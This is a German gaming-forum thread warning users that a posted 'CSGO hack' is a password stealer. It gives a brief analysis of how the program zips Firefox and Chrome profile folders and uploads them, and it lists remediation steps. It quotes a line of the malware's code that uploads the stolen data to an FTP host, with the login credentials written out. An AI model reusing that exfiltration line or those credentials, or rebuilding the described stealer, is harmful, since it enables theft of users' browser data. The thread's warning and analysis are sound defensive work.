Guten Abend
Eben war ja was von CSGO Hacks xD
Downloadet es nicht und öffnet/startet es nicht
Es ist ein Passwort stealer wurde eben von einem Kollegen raus gefunden 
Lg an den typen der jetzt von 3 Leuten das Passwort hat xD
-- SC Snipped by Developer
Sah eh ziemlich suspekt aus, jemand der einfach auf ein Forum geht und sich nichtmal die Regeln durchliest. Dann noch son kurzer Satz und DL.
Sah eh ziemlich suspekt aus, jemand der einfach auf ein Forum geht und sich nichtmal die Regeln durchliest. Dann noch son kurzer Satz und DL.
gibt aber idioten die es downloaden und starten ;D
Das ist natürlich wahr. Aber man hat ja gesehen dass die Mods ordentliche Arbeit geleistet haben und den Thread in wenigen Minuten gelöscht haben.
Jo sollte trotzdem als Info hier stehen an die 3 User die es gedownloadet haben 
ZitatProgram.Upload("ftp://ftp56.world4you.com", "ftp3788100", "hfwt7uubutthead88", text3);
Was heißt das?
Hauptsache n Passwort stealer für steam.
Die kacke ist so verwurfzelt du brauchst 10 Codes um dich einzuloggen.
dort werden die Passwörter auf seinen FTP hochgeladen
Und wie funktioniert der Keylogger?
Wenn man ihn ausführt, hat er den sofort alles, selbst wenn man es danach sofort wieder schließt?
kenne mich damit nicht aus aber so wie es aussieht greift es auf die Passwörter von Firefox uns chrome zu
So und da wir nun alle den Hinweis gefunden haben mache ich hier dicht ehe es in eine Diskussion ausartet. Den Link zum SC habe ich auch einmal entfernt.
BTW: Wer ist so doof und schreibt in einen Keylogger bitte FTP Daten...
kenne mich damit nicht aus aber so wie es aussieht greift es auf die Passwörter von Firefox uns chrome zu
inwiefern bzw. welche Daten hat der "Hacker" jetzt bekommen?
inwiefern bzw. welche Daten hat der "Hacker" jetzt bekommen?
Wie man dem Quellcode entnehmen konnte wurde versucht der komplette Firefox bzw. Chrome Benutzerprofil-Ordner hochzuladen.
Sollte jemand darauf reingefallen sein würde ich raten damit zur Polizei zu gehen.
Nur als kleine Analyse:
Der "Keylogger" ist nur unter Windows gefährlich, unter anderen OS ist er nicht einmal lauffähig.
Folgendes hat er getan sobald man ihn gestartet hat:
Versucht auf den Mozilla FireFox Profiles Ordner zuzugreifen und diesen komplett zu "zippen", die ZIP Datei wurde in c:\tmp\fflog_{RANDOWM_ZAHL}_{USERNAME}.zip gespeichert.
Versucht auf den Google Chrome "Profiles" Ordner zuzugreifen und diesen komplett zu "zippen", die Zip Datei wurde in
c:\tmp\gclog_{RANDOWM_ZAHL}_{USERNAME}.zip abgespeichert.
Danach wurde der komplette C:tmp Ordner gezippt und unter c:\bckp\set_{RANDOWM_ZAHL}_{USERNAME}.zip lokal gespeichert. Diese Datei wurde auf einen FTP Server (in Wien) hochgeladen. Danach wurden alle vom Programm erstellten Dateien gelöscht.
Folgendes sollte man nun auf jeden Fall tun:
1. Die Datei umgehend löschen
2. Kontrollieren ob sich die Datei irgendwie in den Autostart gesetzt hat (laut Quellcode nicht, mein sollte es trotzdem prüfen)
3. Den Computer vollständig neustarten
4. Alle Passwörter ändern die im Browser gespeichert sind (waren)
5. Sich auf allen Webseiten auf denen man "angemeldet bleibt, nach Schließen des Browser" einmal komplett ab- und wieder an melden
Der Hoster des FTP Servers wurde von mir per E-Mail darüber informiert.
